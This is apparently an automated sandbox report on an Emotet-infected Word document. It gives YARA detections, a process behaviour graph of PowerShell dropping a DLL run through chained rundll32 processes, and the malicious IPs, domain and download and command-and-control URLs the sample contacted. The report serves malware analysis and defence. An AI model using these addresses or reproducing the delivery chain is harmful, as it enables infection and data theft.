Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 7_2_1000E372
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 0000000B.00000002.2104461658.0000000000251000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2097868806.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2102162180.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2100838145.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2104434238.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2107224679.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2109356030.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2097792177.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2102227386.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2346608733.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2105642639.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2107394819.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2105597676.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2110979114.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2109268872.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2346635029.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099576537.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2100056068.0000000000701000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2100874845.00000000001A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2111023949.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 14.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 336961 Sample: Informacion_4-09757.doc Startdate: 07/01/2021 Architecture: WINDOWS Score: 100 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Antivirus detection for URL or domain 2->55 57 Multi AV Scanner detection for dropped file 2->57 59 12 other signatures 2->59 14 cmd.exe 2->14         started        17 WINWORD.EXE 436 28 2->17         started        process3 signatures4 73 Suspicious powershell command line found 14->73 75 Very long command line found 14->75 77 Encrypted powershell cmdline option found 14->77 79 PowerShell case anomaly found 14->79 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 51 paulscomputing.com 216.218.207.98, 49167, 80 CENTRALUTAHUS United States 19->51 49 C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll, PE32 19->49 dropped 63 Powershell drops PE file 19->63 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 2 26->28         started        signatures11 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->71 31 rundll32.exe 1 28->31         started        process12 signatures13 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->83 34 rundll32.exe 1 31->34         started        process14 signatures15 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->61 37 rundll32.exe 1 34->37         started        process16 signatures17 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->65 40 rundll32.exe 1 37->40         started        process18 signatures19 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->67 43 rundll32.exe 1 40->43         started        process20 signatures21 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->69 46 rundll32.exe 1 43->46         started        process22 signatures23 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 46->81
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
167.71.148.58
 unknown United States
14061 DIGITALOCEAN-ASNUS true
216.218.207.98
 unknown United States
36103 CENTRALUTAHUS true
202.187.222.40
 unknown Malaysia
9930 TTNET-MYTIMEdotComBerhadMY true
184.66.18.83
 unknown Canada
6327 SHAWCA true

Contacted Domains

Name IP Active
paulscomputing.com 216.218.207.98 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://paulscomputing.com/CraigsMagicSquare/H/ true
  • Avira URL Cloud: malware
 unknown
https://167.71.148.58:443/ta2men4jqfnerm/ true
  • Avira URL Cloud: safe
 unknown